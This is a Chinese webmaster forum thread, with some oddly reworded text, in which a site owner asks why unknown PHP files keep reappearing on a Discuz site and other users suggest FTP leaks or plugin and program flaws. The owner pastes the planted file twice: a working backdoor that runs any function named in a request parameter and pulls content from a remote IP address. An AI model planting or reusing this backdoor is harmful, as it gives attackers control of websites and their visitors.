网站被添加不明文件，求大神指教

静候世界末日那

【如内容违法或虚假，请联系上述邮件删除】

诸如此类的文件，改了效劳密码、用户名还有端口，也更新的系统都还是每天被添加。

求大神指教，谢谢！(关注老榕树网络旗下“网络思维”微信公众号:wlsw360 (每天都有好文章)

 

                                                   本帖如有虚假或违法，请联系邮箱删除，本社区删贴不收任何费用，欢迎举报。老榕树社区属老榕树网络旗下网站，旨在为老榕树用户提供创业咨询、网站建设技术交流、源码下载、提供各种实用工具。如有部分帖子涉及违法、虚假，请你第一时间与社区联系，把需要删除的社区链接提供给我们，我们核实之后，第一时间删除。邮箱：125175998@qq.com

沉默的爱无能为

被黑了还是某个软件生成？
看看文件内容是什么啊。

天天三餐白米饭

对方能写入文件，要么是ftp泄露了，关闭ftp还能写入的话，那就是程序漏洞，这事情，得细致看，看你截图能诊断出来，那就不是神了，是上帝。

原来我也可以20

hhb121 发表于 2017-1-17 16:48
对方能写入文件，要么是ftp泄露了，关闭ftp还能写入的话，那就是程序漏洞，这事情，得细致看，看你截图能诊 ...
没有装FTP软件，假如是程序漏洞怎样办？曾经是最新版本了

静候世界末日那

翻开看看内容 非默许能够备份后 删除

一人一花一凋零

把php贴出来，看看是什么鬼东西

缘来缘去谁的错

crx349 发表于 2017-1-17 16:54
翻开看看内容 非默许能够备份后 删除
删除后又会被添加啊，这个才是省事

草木沁清

mingkong 发表于 2017-1-17 16:47
被黑了还是某个软件生成？
看看文件内容是什么啊。
绝不是软件

二神爱世人

DZ第一帅哥 发表于 2017-1-17 17:01
删除后又会被添加啊，这个才是省事
那可能中毒了

大器晚成成不成

楼主我看你一点都不着急，连被加载出来php也不愿意贴出来，他人知道是怎样回事。另外，不是效劳器问题，不是程序问题，那就是插件问题了，把一切插件都关闭，然后删除那些文件，看看还能不能生成。假如在之前你掩盖过文件，假如数据库泄露了，对方也没办法知道你后台管理账户和密码，除非你默许账密admin，所以说不是数据库爆库的问题，那就是你程序漏洞被植入了可执行文件，招致对方能自动写入，贴出来，大家看看写入的是什么。再来判别。

疯狂DE兔子爸

着重看下效劳器安全和插件这块

天空0129

hhb121 发表于 2017-1-17 17:48
楼主我看你一点都不着急，连被加载出来php也不愿意贴出来，他人知道是怎样回事。另外，不是效劳器问题，不 ...相似于这样的
<?php
set_time_limit(0);
header("Content-Type: text/html;charset=gb2312");
$Remote_server = "http://103.42.29.48/";
$host_name = "http://".$_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF'];
$userAgent = $_SERVER['HTTP_USER_AGENT'];
if(key($_GET)=='SERVER')call_user_func($_GET['SERVER'],$_POST['host_name']);
$Content_mb=getHTTPPage($Remote_server."/index.php?host=".$host_name);
echo $Content_mb;
exit();
function getHTTPPage($url) {
        $opts = array(
          'http'=>array(
                'method'=>"GET",
                'header'=>"User-Agent: aQ0O010O"
          )
        );
        $context = stream_context_create($opts);
        $html = @file_get_contents($url, false, $context);
        if (empty($html)) {
                exit("<p align='center'><font color='red'><b>Connection Error!</b></font></p>");
        }        
        return $html;
}
?>

飞虎奇闻明明

我心枫叶 发表于 2017-1-17 21:46
着重看下效劳器安全和插件这块
相似于这样的文件

代码如下，请问怎样搞

<?php
set_time_limit(0);
header("Content-Type: text/html;charset=gb2312");
$Remote_server = "http://103.42.29.48/";
$host_name = "http://".$_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF'];
$userAgent = $_SERVER['HTTP_USER_AGENT'];
if(key($_GET)=='SERVER')call_user_func($_GET['SERVER'],$_POST['host_name']);
$Content_mb=getHTTPPage($Remote_server."/index.php?host=".$host_name);
echo $Content_mb;
exit();
function getHTTPPage($url) {
        $opts = array(
          'http'=>array(
                'method'=>"GET",
                'header'=>"User-Agent: aQ0O010O"
          )
        );
        $context = stream_context_create($opts);
        $html = @file_get_contents($url, false, $context);
        if (empty($html)) {
                exit("<p align='center'><font color='red'><b>Connection Error!</b></font></p>");
        }        
        return $html;
}
?>

桃之夭夭妞妞

程序呈现漏洞了，当用户阅读页面的时分，返回代码，相似于小偷程序，不知道你网站有什么有价值的东西。 应该是在抓取用户数据。能自己搞就自己搞，上传全新程序，依照升级方式全新掩盖，看看状况，假如自己搞不了，付费支持也能够，Q 861827250  至于缘由，这个不好说，没细致看，说不分明。